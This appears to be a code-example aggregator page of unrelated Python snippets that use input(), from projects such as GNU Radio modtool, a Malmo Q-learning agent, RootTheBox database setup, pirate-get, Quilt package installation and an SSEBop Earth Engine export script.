...     newThetaEq.solve(newTheta, dt=timeStepDuration, solver=GeneralSolver(iterations=2000, tolerance=1e-15))
...     newPhaseEq.solve(newPhase, dt=timeStepDuration, solver=GeneralSolver(iterations=2000, tolerance=1e-15))

The solution is compared against Ryo Kobayashi's test data

>>> print(newTheta.allclose(testData, rtol=1e-7))
1
"""
from __future__ import unicode_literals
from builtins import input
__docformat__ = 'restructuredtext'

if __name__ == '__main__':
    import fipy.tests.doctestPlus
    exec(fipy.tests.doctestPlus._getScript())

    input('finished')
示例#38
0
文件: util.py 项目: zhuzhenping/rlpy
def pause():
    """
    Pauses the output stream awaiting user feedback.
    """
    print("<Press enter/return to continue>")
    input()
示例#39
0
    def setup(self, options):
        ModTool.setup(self, options)

        if self._info['blockname'] is None:
            if len(options) >= 2:
                self._info['blockname'] = options[1]
            else:
                self._info['blockname'] = input(
                    "Enter name of block/code (without module name prefix): ")
        if os.path.isfile("./lib/" + self._info['blockname'] +
                          "_impl.cc") or os.path.isfile(
                              "./python/" + self._info['blockname'] + ".py"):
            raise ModToolException('The given blockname already exists!')
        if not re.match('[a-zA-Z0-9_]+', self._info['blockname']):
            raise ModToolException('Invalid block name.')
        print("Block/code identifier: " + self._info['blockname'])
        self._info['fullblockname'] = self._info['modname'] + '_' + self._info[
            'blockname']

        self._info['blocktype'] = options.block_type
        if self._info['blocktype'] is None:
            # Print list out of blocktypes to user for reference
            print(str(self._block_types))
            with SequenceCompleter(sorted(self._block_types)):
                while self._info['blocktype'] not in self._block_types:
                    self._info['blocktype'] = input("Enter block type: ")
                    if self._info['blocktype'] not in self._block_types:
                        print('Must be one of ' + str(self._block_types))

        # Allow user to specify language interactively if not set
        self._info['lang'] = options.lang
        if self._info['lang'] is None:
            language_candidates = ('c++', 'cpp', 'python')
            with SequenceCompleter(language_candidates):
                while self._info['lang'] not in language_candidates:
                    self._info['lang'] = input("Language (python/cpp): ")
        if self._info['lang'] == 'c++':
            self._info['lang'] = 'cpp'

        print("Language: %s" % {
            'cpp': 'C++',
            'python': 'Python'
        }[self._info['lang']])

        if ((self._skip_subdirs['lib'] and self._info['lang'] == 'cpp') or
            (self._skip_subdirs['python'] and self._info['lang'] == 'python')):
            raise ModToolException('Missing or skipping relevant subdir.')

        if self._info['blockname'] is None:
            self._info['blockname'] = input(
                "Enter name of block/code (without module name prefix): ")
        if not re.match('[a-zA-Z0-9_]+', self._info['blockname']):
            raise ModToolException('Invalid block name.')
        print("Block/code identifier: " + self._info['blockname'])
        self._info['fullblockname'] = self._info['modname'] + '_' + self._info[
            'blockname']
        if not options.license_file:
            self._info['copyrightholder'] = options.copyright
            if self._info['copyrightholder'] is None:
                user = getpass.getuser()
                git_user = self.scm.get_gituser()
                if git_user:
                    copyright_candidates = (user, git_user, 'GNU Radio')
                else:
                    copyright_candidates = (user, 'GNU Radio')
                with SequenceCompleter(copyright_candidates):
                    self._info['copyrightholder'] = input(
                        "Please specify the copyright holder: ")
                    if not self._info['copyrightholder'] or self._info[
                            'copyrightholder'].isspace():
                        self._info['copyrightholder'] = "gr-" + self._info[
                            'modname'] + " author"
            elif self._info['is_component']:
                print(
                    "For GNU Radio components the FSF is added as copyright holder"
                )
        self._license_file = options.license_file
        self._info['license'] = self.setup_choose_license()
        if options.argument_list is not None:
            self._info['arglist'] = options.argument_list
        else:
            self._info['arglist'] = input(
                'Enter valid argument list, including default arguments: ')

        if not (self._info['blocktype'] in ('noblock')
                or self._skip_subdirs['python']):
            self._add_py_qa = options.add_python_qa
            if self._add_py_qa is None:
                self._add_py_qa = ask_yes_no('Add Python QA code?', True)
        if self._info['lang'] == 'cpp':
            self._add_cc_qa = options.add_cpp_qa
            if self._add_cc_qa is None:
                self._add_cc_qa = ask_yes_no('Add C++ QA code?',
                                             not self._add_py_qa)
        self._skip_cmakefiles = options.skip_cmakefiles
        if self._info['version'] == 'autofoo' and not self._skip_cmakefiles:
            print("Warning: Autotools modules are not supported. ",
                  "Files will be created, but Makefiles will not be edited.")
            self._skip_cmakefiles = True
rand_data = all_rand_data[idx_rdn_data, :]
init_cond = cond_std * rand_data + cond_mean
joint_pos = np.deg2rad(init_cond[:3])

env_condition = np.zeros(env.obs_dim)
env_condition[:env.action_dim] = joint_pos
# env_condition[obst_idx] = init_cond[3:]

# Temporally hack for getting ee _object
env.add_custom_init_cond(env_condition)
env.reset(condition=-1)
# obs = self.env.get_observation()
des_tgt = env.get_ee_pose()
env.clear_custom_init_cond(-1)

env_condition[:3] = np.deg2rad(init_joint_pos)
env_condition[tgt_idx] = des_tgt
env_condition[obst_idx] = init_cond[3:]

# Now add the target properly
print('INIT COND', env_condition)
env.add_custom_init_cond(env_condition)

input('adsfkhk')

print("Environment:%s OK!." % type(env).__name__)

env.reset()

input('Press key to close')
示例#41
0
    def run(self, agent_host):
        """run the agent on the world"""

        total_reward = 0
        current_r = 0
        tol = 0.01
        
        self.prev_s = None
        self.prev_a = None
        
        # wait for a valid observation
        world_state = agent_host.peekWorldState()
        while world_state.is_mission_running and all(e.text=='{}' for e in world_state.observations):
            world_state = agent_host.peekWorldState()
        # wait for a frame to arrive after that
        num_frames_seen = world_state.number_of_video_frames_since_last_state
        while world_state.is_mission_running and world_state.number_of_video_frames_since_last_state == num_frames_seen:
            world_state = agent_host.peekWorldState()
        world_state = agent_host.getWorldState()
        for err in world_state.errors:
            print(err)

        if not world_state.is_mission_running:
            return 0 # mission already ended
            
        assert len(world_state.video_frames) > 0, 'No video frames!?'
        
        obs = json.loads( world_state.observations[-1].text )
        prev_x = obs[u'XPos']
        prev_z = obs[u'ZPos']
        print('Initial position:',prev_x,',',prev_z)
        
        if save_images:
            # save the frame, for debugging
            frame = world_state.video_frames[-1]
            image = Image.frombytes('RGB', (frame.width, frame.height), bytes(frame.pixels) )
            iFrame = 0
            self.rep = self.rep + 1
            image.save( 'rep_' + str(self.rep).zfill(3) + '_saved_frame_' + str(iFrame).zfill(4) + '.png' )
            #image.save('rep_' + str(self.rep).zfill(10) + '_saved_frame_' + str(iFrame).zfill(10) + '.png')
            
        # take first action
        total_reward += self.act(world_state,agent_host,current_r)
        
        require_move = True
        check_expected_position = False
        
        # main loop:
        while world_state.is_mission_running:
        
            # wait for the position to have changed and a reward received
            print('Waiting for data...', end=' ')
            while True:
                world_state = agent_host.peekWorldState()
                if not world_state.is_mission_running:
                    print('mission ended.')
                    break
                if len(world_state.rewards) > 0 and not all(e.text=='{}' for e in world_state.observations):
                    obs = json.loads( world_state.observations[-1].text )
                    curr_x = obs[u'XPos']
                    curr_z = obs[u'ZPos']
                    if require_move:
                        if math.hypot( curr_x - prev_x, curr_z - prev_z ) > tol:
                            print('received.')
                            break
                        else:
                            print('Walked into wall.')
                            total_reward -= 3
                            break
                    else:
                        print('received.')
                        break
            # wait for a frame to arrive after that
            num_frames_seen = world_state.number_of_video_frames_since_last_state
            while world_state.is_mission_running and world_state.number_of_video_frames_since_last_state == num_frames_seen:
                world_state = agent_host.peekWorldState()
                
            num_frames_before_get = len(world_state.video_frames)
            
            world_state = agent_host.getWorldState()
            for err in world_state.errors:
                print(err)
            current_r = sum(r.getValue() for r in world_state.rewards)

            if save_images:
                # save the frame, for debugging
                if world_state.is_mission_running:
                    assert len(world_state.video_frames) > 0, 'No video frames!?'
                    frame = world_state.video_frames[-1]
                    image = Image.frombytes('RGB', (frame.width, frame.height), bytes(frame.pixels) )
                    iFrame = iFrame + 1
                    image.save( 'rep_' + str(self.rep).zfill(3) + '_saved_frame_' + str(iFrame).zfill(4) + '_after_' + self.actions[self.prev_a] + '.png' )
                
            if world_state.is_mission_running:
                assert len(world_state.video_frames) > 0, 'No video frames!?'
                num_frames_after_get = len(world_state.video_frames)
                assert num_frames_after_get >= num_frames_before_get, 'Fewer frames after getWorldState!?'
                frame = world_state.video_frames[-1]
                obs = json.loads( world_state.observations[-1].text )
                curr_x = obs[u'XPos']
                curr_z = obs[u'ZPos']
                print('New position from observation:',curr_x,',',curr_z,'after action:',self.actions[self.prev_a], end=' ') #NSWE
                if check_expected_position:
                    expected_x = prev_x + [0,0,-1,1][self.prev_a]
                    expected_z = prev_z + [-1,1,0,0][self.prev_a]
                    if math.hypot( curr_x - expected_x, curr_z - expected_z ) > tol:
                        print(' - ERROR DETECTED! Expected:',expected_x,',',expected_z)
                        input("Press Enter to continue...")
                    else:
                        print('as expected.')
                    curr_x_from_render = frame.xPos
                    curr_z_from_render = frame.zPos
                    print('New position from render:',curr_x_from_render,',',curr_z_from_render,'after action:',self.actions[self.prev_a], end=' ') #NSWE
                    if math.hypot( curr_x_from_render - expected_x, curr_z_from_render - expected_z ) > tol:
                        print(' - ERROR DETECTED! Expected:',expected_x,',',expected_z)
                        input("Press Enter to continue...")
                    else:
                        print('as expected.')
                else:
                    print()
                prev_x = curr_x
                prev_z = curr_z
                # act
                total_reward += self.act(world_state, agent_host, current_r)
                
        # process final reward
        self.logger.debug("Final reward: %d" % current_r)
        total_reward += current_r

        # update Q values
        if self.training and self.prev_s is not None and self.prev_a is not None:
            old_q = self.q_table[self.prev_s][self.prev_a]
            self.q_table[self.prev_s][self.prev_a] = old_q + self.alpha * ( current_r - old_q )

        # Save q_table:
        with open(q_tableFile, 'w') as outfile:
            json.dump(self.q_table, outfile)
            
        self.drawQ()
    
        return total_reward
示例#42
0
            self.board[pos] = PLAYER


if __name__ == "__main__":
    if 'hard' in ''.join(sys.argv[1:]).lower():
        first, second = COMPUTER, PLAYER
    else:
        first, second = PLAYER, COMPUTER

    while True:
        game = TicTacToe()

        turns = itertools.cycle([first, second])
        print(game)
        for _ in VALID_POSITIONS:
            player = next(turns)
            if player == COMPUTER:
                game.ai_move()
            else:
                game.manual_move()
            print(game)
            if game.is_win():
                print('Player {} wins'.format(player))
                break
        else:  # for / else is frowned upon, I do like it here though!
            print('Draw')

        if 'n' in input('Do you want to play again? [yn] ').lower():
            print('Goodbye')
            break
示例#43
0
from models.MarketItem import MarketItem
from models.GameLevel import GameLevel
from models.User import User, ADMIN_PERMISSION
from tornado.options import options

# Fills the database with some startup data.
password = ""

if options.setup.lower().startswith("dev") or options.setup.lower().startswith(
        "docker"):
    admin_handle = "admin"
    password = "******"
    print("Admin Username: %s, Password: %s" % (admin_handle, password))
else:
    admin_handle = str(
        input(PROMPT + "RootTheBox Admin Username [admin]: ")) or "admin"
    sys.stdout.write(PROMPT + "New Admin ")
    sys.stdout.flush()
    password1 = getpass.getpass()
    sys.stdout.write(PROMPT + "Confirm New Admin ")
    sys.stdout.flush()
    password2 = getpass.getpass()
    if password1 == password2 and len(
            password1) >= options.min_user_password_length:
        password = password1
    else:
        print(WARN +
              "Error: Passwords did not match, or was less than %d chars" %
              (options.min_user_password_length, ))
        os._exit(1)
示例#44
0
    9. / 255., 24. / 255., 55. / 255., 87. / 255., 118. / 255., 150. / 255.,
    180. / 255., 200. / 255., 222. / 255.
][::-1])
blue = numpy.array([
    30. / 255., 96. / 255., 112. / 255., 114. / 255., 112. / 255., 101. / 255.,
    72. / 255., 35. / 255., 0. / 255.
][::-1])
ROOT.TColor.CreateGradientColorTable(9, stops, red, green, blue, 255, 1)

labels = ROOT.TLatex()
#labels.SetTextSize(0.04)

lines = ROOT.TLine()
lines.SetLineWidth(2)

pad1 = ROOT.TPad("pad1", "", 0.0, 0.0, 1.0, 1.0)
pad1.Draw()
pad1.cd()
hist.Draw("colz")
labels.DrawLatex(1800, 45, "%ddp" % nDoublePlanes)

for i in [1, 2, 3, 4]:
    cut = tparfile.Get("R3BNeulandNeutron2DPar").GetNeutronCut(i)
    w = cut.IntegralHist(hist)
    labels.DrawLatex(70, i * 11 - 7, "%2d%%" % (w / 100))
    cut.Draw("same")

canvas.SaveAs(outfile)

input("Press enter to continue...")
示例#45
0
def pirate_main(args):
    printer = Printer(args.color)

    # print version
    if args.version:
        printer.print('pirate-get, version {}'.format(pirate.data.version))
        sys.exit(0)

    # check it transmission is running
    if args.transmission:
        ret = subprocess.call(args.transmission_command + ['-l'],
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL)
        if ret != 0:
            printer.print('Transmission is not running.')
            sys.exit(1)

    # non-torrent fetching actions

    if args.action == 'list_categories':
        cur_color = 'zebra_0'
        for key, value in sorted(pirate.data.categories.items()):
            cur_color = 'zebra_0' if cur_color == 'zebra_1' else 'zebra_1'
            printer.print(str(value), '\t', key, sep='', color=cur_color)
        return

    if args.action == 'list_sorts':
        cur_color = 'zebra_0'
        for key, value in sorted(pirate.data.sorts.items()):
            cur_color = 'zebra_0' if cur_color == 'zebra_1' else 'zebra_1'
            printer.print(str(value), '\t', key, sep='', color=cur_color)
        return

    # fetch torrents

    if args.source == 'local_tpb':
        results = pirate.local.search(args.database, args.search)
    elif args.source == 'tpb':
        try:
            results, site = search_mirrors(printer, args)
        except IOError as e:
            printer.print(e.args[0] + ' :( ', color='ERROR')
            if len(e.args) > 1:
                printer.print(e.args[1])
            sys.exit(1)

    if len(results) == 0:
        printer.print('No results')
        return

    printer.search_results(results, local=args.source == 'local_tpb')

    # number of results to pick
    if args.first:
        printer.print('Choosing first result')
        choices = [0]
    elif args.download_all:
        printer.print('Downloading all results')
        choices = range(len(results))
    else:
        # interactive loop for per-torrent actions
        while True:
            printer.print("\nSelect links (Type 'h' for more options"
                          ", 'q' to quit)", end='\b', color='alt')
            try:
                l = builtins.input(': ')
            except (KeyboardInterrupt, EOFError):
                printer.print('\nCancelled.')
                return

            try:
                code, choices = parse_torrent_command(l)
                # Act on option, if supplied
                printer.print('')
                if code == 'h':
                    printer.print('Options:',
                                  '<links>: Download selected torrents',
                                  '[m<links>]: Save magnets as files',
                                  '[t<links>]: Save .torrent files',
                                  '[d<links>]: Get descriptions',
                                  '[f<links>]: Get files',
                                  '[p] Print search results',
                                  '[q] Quit', sep='\n')
                elif code == 'q':
                    printer.print('Bye.', color='alt')
                    return
                elif code == 'd':
                    printer.descriptions(choices, results, site)
                elif code == 'f':
                    printer.file_lists(choices, results, site)
                elif code == 'p':
                    printer.search_results(results)
                elif code == 'm':
                    pirate.torrent.save_magnets(printer, choices, results,
                                                args.save_directory)
                elif code == 't':
                    pirate.torrent.save_torrents(printer, choices, results,
                                                 args.save_directory)
                elif not l:
                    printer.print('No links entered!', color='WARN')
                else:
                    break
            except Exception as e:
                printer.print('Exception:', e, color='ERROR')
                return

    # output

    if args.output == 'save_magnet_files':
        printer.print('Saving selected magnets...')
        pirate.torrent.save_magnets(choices, results, args.save_directory)
        return

    if args.output == 'save_torrent_files':
        printer.print('Saving selected torrents...')
        pirate.torrent.save_torrents(choices, results, args.save_directory)
        return

    for choice in choices:
        url = results[choice]['magnet']

        if args.output == 'transmission':
            subprocess.call(args.transmission_command + ['--add', url])
        elif args.output == 'open_command':
            cmd = parse_cmd(args.open_command, url)
            printer.print(" ".join(cmd))
            subprocess.call(cmd)
        elif args.output == 'browser_open':
            webbrowser.open(url)

    if args.output == 'transmission':
        subprocess.call(args.transmission_command + ['-l'])
示例#46
0
def install(package, hash=None, version=None, tag=None, force=False):
    """
    Download a Quilt data package from the server and install locally.

    At most one of `hash`, `version`, or `tag` can be given. If none are
    given, `tag` defaults to "latest".
    """
    if hash is version is tag is None:
        tag = LATEST_TAG

    assert [hash, version, tag].count(None) == 2

    owner, pkg = _parse_package(package)
    session = _get_session()
    store = PackageStore()
    existing_pkg = store.get_package(owner, pkg)

    if existing_pkg is not None and not force:
        print("{owner}/{pkg} already installed.".format(owner=owner, pkg=pkg))
        overwrite = input("Overwrite? (y/n) ")
        if overwrite.lower() != 'y':
            return

    if version is not None:
        response = session.get(
            "{url}/api/version/{owner}/{pkg}/{version}".format(
                url=QUILT_PKG_URL,
                owner=owner,
                pkg=pkg,
                version=version
            )
        )
        pkghash = response.json()['hash']
    elif tag is not None:
        response = session.get(
            "{url}/api/tag/{owner}/{pkg}/{tag}".format(
                url=QUILT_PKG_URL,
                owner=owner,
                pkg=pkg,
                tag=tag
            )
        )
        pkghash = response.json()['hash']
    else:
        pkghash = hash
    assert pkghash is not None

    response = session.get(
        "{url}/api/package/{owner}/{pkg}/{hash}".format(
            url=QUILT_PKG_URL,
            owner=owner,
            pkg=pkg,
            hash=pkghash
        )
    )
    assert response.ok # other responses handled by _handle_response

    dataset = response.json(object_hook=decode_node)
    response_urls = dataset['urls']
    response_contents = dataset['contents']

    # Verify contents hash
    if pkghash != hash_contents(response_contents):
        raise CommandException("Mismatched hash. Try again.")

    pkgobj = store.install_package(owner, pkg, response_contents)

    total = len(response_urls)
    for idx, (download_hash, url) in enumerate(sorted(iteritems(response_urls))):
        print("Downloading %s (%d/%d)..." % (download_hash, idx + 1, total))

        local_filename = store.object_path(download_hash)
        if os.path.exists(local_filename):
            file_hash = digest_file(local_filename)
            if file_hash == download_hash:
                print("Fragment already installed; skipping.")
                continue
            else:
                print("Fragment already installed, but has the wrong hash (%s); re-downloading." %
                      file_hash)

        response = requests.get(url, stream=True)
        if not response.ok:
            msg = "Download {hash} failed: error {code}"
            raise CommandException(msg.format(hash=download_hash, code=response.status_code))

        length_remaining = response.raw.length_remaining

        temp_path = store.temporary_object_path(download_hash)
        with open(temp_path, 'wb') as output_file:
            with tqdm(total=length_remaining, unit='B', unit_scale=True) as progress:
                # `requests` will automatically un-gzip the content, as long as
                # the 'Content-Encoding: gzip' header is set.
                # To report progress, however, we need the length of the original compressed data;
                # we use the undocumented but technically public `response.raw.length_remaining`.
                for chunk in response.iter_content(chunk_size=CHUNK_SIZE):
                    if chunk: # filter out keep-alive new chunks
                        output_file.write(chunk)
                    if response.raw.length_remaining is not None:  # Not set in unit tests.
                        progress.update(length_remaining - response.raw.length_remaining)
                        length_remaining = response.raw.length_remaining

        file_hash = digest_file(temp_path)
        if file_hash != download_hash:
            os.remove(temp_path)
            raise CommandException("Fragment hashes do not match: expected %s, got %s." %
                                   (download_hash, file_hash))

        os.rename(temp_path, local_filename)

    pkgobj.save_contents()
示例#47
0
def visualize(segments, extra_info=None, show_all=False, no_ticks=False):
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D

    # scale the axes to match for all the segments
    axes_min = np.array(np.min(segments[0], axis=0))
    axes_max = np.array(np.max(segments[0], axis=0))

    for seg in segments[1:]:
        axes_min = np.minimum(axes_min, np.min(seg, axis=0))
        axes_max = np.maximum(axes_max, np.max(seg, axis=0))

    # display segments
    fig_id = 1
    plt.ion()
    for i, seg in enumerate(segments):
        if show_all:
            fig_id = i + 1

        fig = plt.figure(fig_id)
        plt.clf()
        ax = fig.add_subplot(111, projection="3d")

        ax.set_xlim(axes_min[0], axes_max[0])
        ax.set_ylim(axes_min[1], axes_max[1])
        ax.set_zlim(axes_min[2], axes_max[2])

        if no_ticks:
            tick_count = 3
            ax.set_xticks(
                np.linspace(axes_min[0], axes_max[0], tick_count + 2)[1:-1])
            ax.set_yticks(
                np.linspace(axes_min[1], axes_max[1], tick_count + 2)[1:-1])
            ax.set_zticks(
                np.linspace(axes_min[2], axes_max[2], tick_count + 2)[1:-1])

            plt.setp(ax.get_xmajorticklabels(), visible=False)
            plt.setp(ax.get_ymajorticklabels(), visible=False)
            plt.setp(ax.get_zmajorticklabels(), visible=False)

        ax.scatter(seg[:, 0], seg[:, 1], seg[:, 2])

        info = "Segment " + str(i)
        if extra_info is not None:
            info = info + " " + str(extra_info[i])
        sys.stdout.write(info)

        fig.canvas.flush_events()

        if not show_all:
            key = input()
            if key == "q":
                break
        else:
            sys.stdout.write("\n")

    if show_all:
        input()

    plt.ioff()
    plt.close("all")
示例#48
0
d = parcnsdl.ConvBPDNDictLearn_Consensus(D0, sh, lmbda, opt)
D1 = d.solve()
print("ConvBPDNDictLearn_Consensus solve time: %.2fs" %
      d.timer.elapsed('solve'))


"""
Display initial and final dictionaries.
"""

D1 = D1.squeeze()
fig = plot.figure(figsize=(14, 7))
plot.subplot(1, 2, 1)
plot.imview(util.tiledict(D0), fig=fig, title='D0')
plot.subplot(1, 2, 2)
plot.imview(util.tiledict(D1), fig=fig, title='D1')
fig.show()


"""
Get iterations statistics from solver object and plot functional value
"""

its = d.getitstat()
plot.plot(its.ObjFun, xlbl='Iterations', ylbl='Functional')


# Wait for enter on keyboard
input()
示例#49
0
                "dhclient", "-d",
                "br%d" % j, "-cf",
                "/tmp/dhcp_%d_%d/dhclient.conf" % (host_id, j), "-lf",
                "/tmp/dhcp_%d_%d/dhclient.lease" % (host_id, j)
            ]
            d_client.append(Popen(cmd, stdout=PIPE, stderr=PIPE))

            # make sure we get address for eth0
            retry = -1
            while retry < 0:
                check = Popen(
                    ["ip", "addr", "show", "br%d" % j],
                    stdout=PIPE,
                    stderr=PIPE)
                out = check.stdout.read()
                checkip = "99.1.%d" % j
                retry = out.find(checkip)


try:
    run()
    input("")
finally:
    for v in ifc_gc:
        call(["ip", "link", "del", v])
    ipdb.release()
    for p in d_client:
        p.kill()
    for p in d_serv:
        p.kill()
示例#50
0
def visualize_side_by_side(segments, extra_info=None, show_all=False):

    import matplotlib.cm as cm

    n_views = 6.0
    if len(segments) < n_views:
        return

    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D

    # scale the axes to match for all the segments
    axes_min = np.array(np.min(segments[0], axis=0))
    axes_max = np.array(np.max(segments[0], axis=0))
    max_range = 0
    for seg in segments[1:]:
        axes_min = np.minimum(axes_min, np.min(seg, axis=0))
        axes_max = np.maximum(axes_max, np.max(seg, axis=0))
        X = seg[:, 0]
        Y = seg[:, 1]
        Z = seg[:, 2]
        new_max_range = np.array([X.max() - X.min(),
                                  Y.max() - Y.min()]).max() / 2.0
        if new_max_range > max_range:
            max_range = new_max_range
    fig = plt.figure(1, frameon=False)
    plt.clf()
    cmap = plt.cm.jet
    # fig, axs = plt.subplots(1,len(segments), projection='3d', facecolor='w', edgecolor='w') #figsize=(15, 6)
    fig.subplots_adjust(hspace=.5, wspace=.001)

    views_ids = [0]
    segments_temp = []
    for i in range(int(n_views - 1)):
        idx = i * len(segments) / n_views
        print(idx)
        views_ids = views_ids + [int(idx)]
        segments_temp.append(segments[int(idx)])
    segments_temp.append(segments[len(segments) - 1])
    segments = segments_temp

    print(max_range)

    for i, seg in enumerate(segments):
        ax = fig.add_subplot(1, len(segments), i + 1, projection="3d")
        ax.set_xlim(axes_min[0], axes_max[0])
        ax.set_ylim(axes_min[1], axes_max[1])
        ax.set_zlim(axes_min[2], axes_max[2])

        mid_x = (seg[:, 0].max() + seg[:, 0].min()) * 0.5
        mid_y = (seg[:, 1].max() + seg[:, 1].min()) * 0.5
        mid_z = (seg[:, 2].max() + seg[:, 2].min()) * 0.5
        ax.set_xlim(mid_x - max_range, mid_x + max_range)
        ax.set_ylim(mid_y - max_range, mid_y + max_range)
        ax.set_zlim(mid_z - max_range, mid_z + max_range)
        ax.set_aspect(1)

        plt.setp(ax.get_xmajorticklabels(), visible=False)
        plt.setp(ax.get_ymajorticklabels(), visible=False)
        plt.setp(ax.get_zmajorticklabels(), visible=False)

        tick_count = 3
        ax.set_xticks(
            np.linspace(axes_min[0], axes_max[0], tick_count + 2)[1:-1])
        ax.set_yticks(
            np.linspace(axes_min[1], axes_max[1], tick_count + 2)[1:-1])
        ax.set_zticks(
            np.linspace(axes_min[2], axes_max[2], tick_count + 2)[1:-1])

        ax.set_xticklabels([1, 2, 3, 4])
        # fig.patch.set_visible(False)
        # ax.axis('off')
        ax.scatter(
            seg[:, 0],
            seg[:, 1],
            seg[:, 2],
            s=1,
            c=seg[:, 2],
            marker="o",
            lw=0,
            depthshade=False,
            cmap="jet_r",
        )
        ax.grid(b=False)
        ax.patch.set_facecolor("white")
        ax.set_axis_off()
    plt.draw()
    plt.pause(0.001)

    key = input()
def main(ini_path=None,
         overwrite_flag=False,
         delay_time=0,
         gee_key_file=None,
         max_ready=-1,
         cron_flag=False,
         reverse_flag=False,
         update_flag=False):
    """Compute scene Tcorr images by WRS2 tile

    Parameters
    ----------
    ini_path : str
        Input file path.
    overwrite_flag : bool, optional
        If True, overwrite existing files if the export dates are the same and
        generate new images (but with different export dates) even if the tile
        lists are the same.  The default is False.
    delay_time : float, optional
        Delay time in seconds between starting export tasks (or checking the
        number of queued tasks, see "max_ready" parameter).  The default is 0.
    gee_key_file : str, None, optional
        Earth Engine service account JSON key file (the default is None).
    max_ready: int, optional
        Maximum number of queued "READY" tasks.  The default is -1 which is
        implies no limit to the number of tasks that will be submitted.
    cron_flag: bool, optional
        Not currently implemented.
    reverse_flag : bool, optional
        If True, process WRS2 tiles and dates in reverse order.
    update_flag : bool, optional
        If True, only overwrite scenes with an older model version.

    """
    logging.info('\nCompute scene Tcorr images by WRS2 tile')

    ini = utils.read_ini(ini_path)

    model_name = 'SSEBOP'
    # model_name = ini['INPUTS']['et_model'].upper()

    tmax_name = ini[model_name]['tmax_source']

    export_id_fmt = 'tcorr_scene_{product}_{scene_id}'
    asset_id_fmt = '{coll_id}/{scene_id}'

    tcorr_scene_coll_id = '{}/{}_scene'.format(ini['EXPORT']['export_coll'],
                                               tmax_name.lower())

    wrs2_coll_id = 'projects/earthengine-legacy/assets/' \
                   'projects/usgs-ssebop/wrs2_descending_custom'
    wrs2_tile_field = 'WRS2_TILE'
    wrs2_path_field = 'ROW'
    wrs2_row_field = 'PATH'

    try:
        wrs2_tiles = str(ini['INPUTS']['wrs2_tiles'])
        wrs2_tiles = sorted([x.strip() for x in wrs2_tiles.split(',')])
    except KeyError:
        wrs2_tiles = []
        logging.debug('  wrs2_tiles: not set in INI, defaulting to []')
    except Exception as e:
        raise e

    try:
        study_area_extent = str(ini['INPUTS']['study_area_extent']) \
            .replace('[', '').replace(']', '').split(',')
        study_area_extent = [float(x.strip()) for x in study_area_extent]
    except KeyError:
        study_area_extent = None
        logging.debug('  study_area_extent: not set in INI')
    except Exception as e:
        raise e

    # TODO: Add try/except blocks and default values?
    collections = [x.strip() for x in ini['INPUTS']['collections'].split(',')]
    cloud_cover = float(ini['INPUTS']['cloud_cover'])
    min_pixel_count = float(ini['TCORR']['min_pixel_count'])
    # min_scene_count = float(ini['TCORR']['min_scene_count'])

    if (tmax_name.upper() == 'CIMIS'
            and ini['INPUTS']['end_date'] < '2003-10-01'):
        logging.error(
            '\nCIMIS is not currently available before 2003-10-01, exiting\n')
        sys.exit()
    elif (tmax_name.upper() == 'DAYMET'
          and ini['INPUTS']['end_date'] > '2018-12-31'):
        logging.warning('\nDAYMET is not currently available past 2018-12-31, '
                        'using median Tmax values\n')
        # sys.exit()
    # elif (tmax_name.upper() == 'TOPOWX' and
    #         ini['INPUTS']['end_date'] > '2017-12-31'):
    #     logging.warning(
    #         '\nDAYMET is not currently available past 2017-12-31, '
    #         'using median Tmax values\n')
    #     # sys.exit()

    # Extract the model keyword arguments from the INI
    # Set the property name to lower case and try to cast values to numbers
    model_args = {
        k.lower(): float(v) if utils.is_number(v) else v
        for k, v in dict(ini[model_name]).items()
    }
    # et_reference_args = {
    #     k: model_args.pop(k)
    #     for k in [k for k in model_args.keys() if k.startswith('et_reference_')]}

    logging.info('\nInitializing Earth Engine')
    if gee_key_file:
        logging.info(
            '  Using service account key file: {}'.format(gee_key_file))
        # The "EE_ACCOUNT" parameter is not used if the key file is valid
        ee.Initialize(ee.ServiceAccountCredentials('x', key_file=gee_key_file),
                      use_cloud_api=True)
    else:
        ee.Initialize(use_cloud_api=True)

    # Get a Tmax image to set the Tcorr values to
    logging.debug('\nTmax properties')
    tmax_source = tmax_name.split('_', 1)[0]
    tmax_version = tmax_name.split('_', 1)[1]
    if 'MEDIAN' in tmax_name.upper():
        tmax_coll_id = 'projects/earthengine-legacy/assets/' \
                       'projects/usgs-ssebop/tmax/{}'.format(tmax_name.lower())
        tmax_coll = ee.ImageCollection(tmax_coll_id)
        tmax_mask = ee.Image(tmax_coll.first()).select([0]).multiply(0)
    else:
        # TODO: Add support for non-median tmax sources
        raise ValueError('unsupported tmax_source: {}'.format(tmax_name))
    logging.debug('  Collection: {}'.format(tmax_coll_id))
    logging.debug('  Source:  {}'.format(tmax_source))
    logging.debug('  Version: {}'.format(tmax_version))

    logging.debug('\nExport properties')
    export_info = utils.get_info(ee.Image(tmax_mask))
    if 'daymet' in tmax_name.lower():
        # Custom smaller extent for DAYMET focused on CONUS
        export_extent = [-1999750, -1890500, 2500250, 1109500]
        export_shape = [4500, 3000]
        export_geo = [1000, 0, -1999750, 0, -1000, 1109500]
        # Custom medium extent for DAYMET of CONUS, Mexico, and southern Canada
        # export_extent = [-2099750, -3090500, 2900250, 1909500]
        # export_shape = [5000, 5000]
        # export_geo = [1000, 0, -2099750, 0, -1000, 1909500]
        export_crs = export_info['bands'][0]['crs']
    else:
        export_crs = export_info['bands'][0]['crs']
        export_geo = export_info['bands'][0]['crs_transform']
        export_shape = export_info['bands'][0]['dimensions']
        # export_geo = ee.Image(tmax_mask).projection().getInfo()['transform']
        # export_crs = ee.Image(tmax_mask).projection().getInfo()['crs']
        # export_shape = ee.Image(tmax_mask).getInfo()['bands'][0]['dimensions']
        export_extent = [
            export_geo[2], export_geo[5] + export_shape[1] * export_geo[4],
            export_geo[2] + export_shape[0] * export_geo[0], export_geo[5]
        ]
    export_geom = ee.Geometry.Rectangle(export_extent,
                                        proj=export_crs,
                                        geodesic=False)
    logging.debug('  CRS: {}'.format(export_crs))
    logging.debug('  Extent: {}'.format(export_extent))
    logging.debug('  Geo: {}'.format(export_geo))
    logging.debug('  Shape: {}'.format(export_shape))

    if study_area_extent is None:
        if 'daymet' in tmax_name.lower():
            # CGM - For now force DAYMET to a slightly smaller "CONUS" extent
            study_area_extent = [-125, 25, -65, 49]
            # study_area_extent =  [-125, 25, -65, 52]
        elif 'cimis' in tmax_name.lower():
            study_area_extent = [-124, 35, -119, 42]
        else:
